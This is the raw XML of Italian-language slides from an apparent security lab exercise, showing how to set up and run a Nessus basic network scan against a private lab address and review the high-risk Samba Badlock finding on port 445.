                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per lo scopo di questo esercizio effettueremo una Basic Scan, che analizzerà le porte più comuni ed utilizzate della macchina target.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 26" id="26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="10736134">
            <a:off x="17167208" y="5779747"/>
            <a:ext cx="923597" cy="614192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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43780" y="1203187"/>
            <a:ext cx="7085450" cy="9818518"/>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2079603" y="2724866"/>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1432922" y="7569706"/>
            <a:ext cx="4722715" cy="1881407"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1881407" w="4722715">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4722714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4722714" y="1881406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1881406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="377246" y="1820616"/>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Setup di Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="978538" y="2934756"/>
            <a:ext cx="7365616" cy="6646124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="590417" indent="-295209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Prima di tutto avviamo il servizio di Nessus con il comando :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A questo punto apriamo il browser e andiamo all’indirizzo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>https://kali:8834</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, la porta dove inseriremo le nostre credenziali per entrare in Nessus. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Dopo di ciò, cliccheremo sul tasto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>new scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per iniziare a configurare la nuova scansione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11321941" y="2084225"/>
            <a:ext cx="6593115" cy="4618706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4618706" w="6593115">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6593116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6593116" y="4618706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4618706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1210633" y="3920730"/>
            <a:ext cx="8179974" cy="1289108"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1289108" w="8179974">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8179974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8179974" y="1289108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1289108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-636538">
            <a:off x="8975038" y="5001631"/>
            <a:ext cx="2441452" cy="1489286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1489286" w="2441452">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2441452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441452" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="2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Freeform 28" id="28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="333186">
            <a:off x="8925141" y="7654381"/>
            <a:ext cx="2441452" cy="1489286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1489286" w="2441452">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2441452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441452" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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3794537" y="-194070"/>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AutoShape 18" id="1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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11056117" y="1642892"/>
            <a:ext cx="6572889" cy="3274043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3274043" w="6572889">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6572889" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6572889" y="3274043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3274043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-25564" t="-35545" r="-13884" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12228634" y="5695950"/>
            <a:ext cx="3252264" cy="3793224"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3793224" w="3252264">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3252264" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3252264" y="3793224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3793224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="-51623" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="1903317">
            <a:off x="8239801" y="6798122"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1457877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>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3" id="23"/>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4" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2051028"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TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="3468378"/>
            <a:ext cx="8296013" cy="4893268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Andremo poi a cliccare su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Basic Network Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e configureremo così il servizio. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inseriamo un nome e la descrizione, decidiamo poi una cartella di destinazione e infine specifichiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>l’indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> del nostro target, in questo caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>192.168.50.150</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Vediamo come la scansione effettuerà un check su tutte le porte più comunemente utilizzate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Dopodiché, facciamo partire la scansione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-1391984">
            <a:off x="7881797" y="2113906"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="1457878"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1457878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457878"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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384856" y="930978"/>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2201992" y="201602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AutoShape 18" id="1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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8993447" y="1028700"/>
            <a:ext cx="7736441" cy="3709018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3709018" w="7736441">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736441" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736441" y="3709018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3709018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-24558" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10829768" y="5050125"/>
            <a:ext cx="7080327" cy="4536788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4536788" w="7080327">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7080326" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7080326" y="4536787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4536787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-1741" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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3" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="283772" y="2698944"/>
            <a:ext cx="6143435" cy="6149897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>La scansione richiede un determinato ammontare di tempo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Una volta finita, possiamo vedere tutte le vulnerabilità trovate messe in ordine di rischio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A noi interessa la Vulnerabilità di livello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>HIGH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> chiamata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Samba Badlock Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Cliccando su di essa, abbiamo una descrizione della vulnerabilità insieme alla porta dove si trova, in questo caso la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> 445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> che è quella che ci interessa ai fini dell’esercizio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2213">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nessus fornisce anche della documentazione a riguardo, coaudivata da possibili soluzioni. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3098"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2234450"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2.2 - BASIC SCAN CON NESSUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-1619713">
            <a:off x="6127529" y="1469502"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
